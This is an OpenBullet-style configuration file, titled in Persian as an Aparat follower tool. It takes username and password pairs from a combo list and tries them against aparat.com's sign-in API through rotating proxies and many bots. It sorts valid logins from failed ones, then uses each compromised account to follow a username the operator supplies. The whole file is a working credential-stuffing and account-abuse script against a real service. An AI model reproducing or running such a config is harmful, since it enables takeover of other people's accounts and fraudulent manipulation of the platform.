[SETTINGS]
{
  "Name": "دنبال کننده اپارات",
  "SuggestedBots": 179,
  "MaxCPM": 0,
  "LastModified": "2022-04-28T07:35:48.5156181+00:00",
  "AdditionalInfo": "ساخته شده توسط Sir Meti",
  "RequiredPlugins": [],
  "Author": "sir meti",
  "Version": "EtriBullet",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "نام کاربری خود را وارد کنید",
      "VariableName": "USERNAMEEmilad",
      "Id": 155997696
    }
  ],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GET_GUID REQUEST GET "https://www.aparat.com/signin" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Guid PARSE "<SOURCE>" LR "guid: \"" "\"," -> VAR "G11milad" 

#GET_TEMP REQUEST POST "https://www.aparat.com/api/fa/v1/user/Authenticate/auth?callbackType=postmessage" 
  CONTENT "{\"guid\":\"<G11milad>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: www.aparat.com" 
  HEADER "Origin: https://www.aparat.com" 
  HEADER "Referer: https://www.aparat.com/signin?callbackType=postmessage" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#TEMPID PARSE "<SOURCE>" LR "\":{\"temp_id\":\"" "\"," -> VAR "TEMPIDmilad" 

#LOGIN1 REQUEST POST "https://www.aparat.com/api/fa/v1/user/Authenticate/signin_step1" 
  CONTENT "{\"account\":\"<USER>\",\"temp_id\":\"<TEMPIDmilad>\",\"guid\":\"<G11milad>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: www.aparat.com" 
  HEADER "Origin: https://www.aparat.com" 
  HEADER "Referer: https://www.aparat.com/signin?callbackType=postmessage" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "errors" 
  KEYCHAIN Success OR 
    KEY "authenticate" 

#Tempid2 PARSE "<SOURCE>" LR "temp_id\":\"" "\",\"code" -> VAR "TEMP2Milad" 

#LOGIN2 REQUEST POST "https://www.aparat.com/api/fa/v1/user/Authenticate/signin_step2" 
  CONTENT "{\"temp_id\":\"<TEMP2Milad>\",\"account\":\"<USER>\",\"codepass_type\":\"pass\",\"code\":\"<PASS>\",\"guid\":\"<G11milad>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: www.aparat.com" 
  HEADER "Origin: https://www.aparat.com" 
  HEADER "Referer: https://www.aparat.com/signin/password" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#USERNAME PARSE "<SOURCE>" LR "\",\"username\":\"" "\"," -> VAR "USERNAMEE" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "errors" 
  KEYCHAIN Success OR 
    KEY "authenticate" 

REQUEST GET "https://www.aparat.com/api/fa/v1/user/user/information/username/<USERNAMEEmilad>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#userid PARSE "<SOURCE>" LR "userid\\/" "\\" -> VAR "useridMilad" 

#tty PARSE "<SOURCE>" LR "tty\\/" "\\" -> VAR "ttyMilad" 

#hash PARSE "<SOURCE>" LR "/hash\\/" "\"," -> VAR "hashMilad" 

REQUEST GET "https://www.aparat.com/api/fa/v1/user/follow/follow/userid/<useridMilad>/type/true/tty/<ttyMilad>/hash/<hashMilad>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

